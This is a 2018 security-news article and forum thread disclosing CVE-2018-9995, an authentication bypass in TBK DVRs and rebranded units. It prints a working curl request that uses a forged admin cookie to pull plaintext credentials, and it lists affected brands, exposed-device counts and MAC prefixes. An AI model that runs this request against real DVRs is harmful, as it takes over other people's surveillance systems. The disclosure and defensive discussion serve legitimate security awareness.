Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

Avatar
John Scanlan
May 02, 2018
IPVM • IPVMU Certified

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.

The DVRs affected are manufacturer by TBK as well as OEM'd by:

  • CeNova
  • DVR Login
  • HVR Login
  • MDVR Login
  • Night OWL
  • Novo
  • Pulnix
  • QSee
  • Securus
  • XVR 5 in 1

The exploit, tested by IPVM, is a simple CURL command:

curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).



The plain text credentials returned from this command granted admin access to the device.

(2)
(1)
U
Undisclosed #1
May 02, 2018
IPVMU Certified

opt=user&cmd=list

Obviously they really tried hard to hide this backdoor ;)

(3)
(2)
U
Undisclosed #2
May 03, 2018

The key here is probably the cookie...

-H "Cookie: uid=admin"

Like the recent Hikvision cloud exploit, it looks like these cameras are taking the "logged in" user value from the cookie. "You're the admin you say? Come on in!"

If you're going to use cookies, it's trivial to use a simple token. Generate a token on login, let the user store that token in a cookie, and if the user supplies an expired or unrecognized token, force login again. Anything is better than letting the user decide what level of privilege they should have.

PS
Paul Shah
May 02, 2018

 Do they have a businesses presence in the US?

Avatar
John Scanlan
May 02, 2018
IPVM • IPVMU Certified

TBK is Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Coscto, and more.

(1)
(1)
PS
Paul Shah
May 02, 2018

John, 

Q-See is OEMing TVT and Dahua, at least for the past few years. 

Night Owl is HIkvision and Raysharp for the past few years as well. 

I would be interested  to see the models from TBK for these brands. 

(1)
Avatar
John Scanlan
May 02, 2018
IPVM • IPVMU Certified

There are ~1.5k vulnerable units online in the US, out of ~55k total vulnerable units online worldwide.

The VR4104 and DVR4216 series from TBK are vulnerable.  I am not sure what those model numbers are at the OEMs, but will look into it and report back here with anything I find.

Vulnerable Q-See Login:

DVR_login_4

Vulnerable Night Owl Login:

DVR_login_5

 

(1)
Avatar
Jon Dillabaugh
May 03, 2018
Pro Focus LLC

Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.

EG
Edward Greenspan
May 10, 2018

Does anyone have the MAC prefix for their devices?

 

Avatar
John Scanlan
May 10, 2018
IPVM • IPVMU Certified

Sean - Here is a list of the affected brands and the associated OUIs:

Brands

TBK
CeNova
DVR Login
HVR Login
MDVR Login
Night OWL
Novo
Pulnix
QSee
Securus
XVR 5 in 1

OUIs:

00:06:1B
00:0C:DF
00:12:DF
00:12:FE
00:14:65
00:27:1A
00:59:07
08:A5:C8
0C:CB:85
14:1A:A3
14:30:C6
14:36:C6
14:9F:E8
1C:56:FE
1C:AB:01
20:76:93
24:DA:9B
30:4B:07
34:BB:26
38:80:DF
40:5A:9B
40:78:6A
40:88:05
44:80:EB
50:3C:C4
54:2B:57
54:C5:7A
5C:51:88
60:31:3B
60:99:D1
60:BE:B5
60:D2:1C
60:D9:A0
68:C4:4D
6C:5F:1C
70:72:0D
74:04:2B
74:AE:76
80:58:F8
80:6C:1B
80:CF:41
84:10:0D
88:6B:44
88:70:8C
88:79:7E
88:B4:A6
90:68:C3
98:FF:D0
9C:D9:17
A0:32:99
A4:70:D6
A4:8C:DB
A8:96:75
AC:38:70
B0:79:94
BC:FF:EB
C8:DD:C9
CC:07:E4
CC:61:E5
CC:C3:EA
D0:04:01
D0:77:14
D4:22:3F
D4:63:C6
D8:71:57
DC:BF:E9
E0:0B:28
E0:2C:B2
E0:75:7D
E0:98:61
E4:90:7E
E8:91:20
EC:88:92
EC:89:F5
F0:D7:AA
F4:F1:E1
F4:F5:24
F8:CF:C5
F8:E0:79
F8:F1:B6

(2)
EG
Edward Greenspan
May 10, 2018

Amazing!  Thanks!

Avatar
Sean Nelson
May 10, 2018
Nelly's Security

Manufactured by TBK, a spanish company? Are they really manufactured in a spanish country?

(1)
SF
Shay Fogel
May 11, 2018

Those dvr’s were designed and manufactured by Streamax, China.

Avatar
Vincent Tong
May 11, 2018

TBK looks like TVT to me.  QSEE often uses TVT

(1)
Avatar
Abaas Mahroos
Mar 05, 2019
Al Aswar Trading Group • IPVMU Certified

This is correct. TBK is actually just a TVT OEM.

New discussion

Ask questions and get answers to your physical security questions from IPVM team members and fellow subscribers.

Newest discussions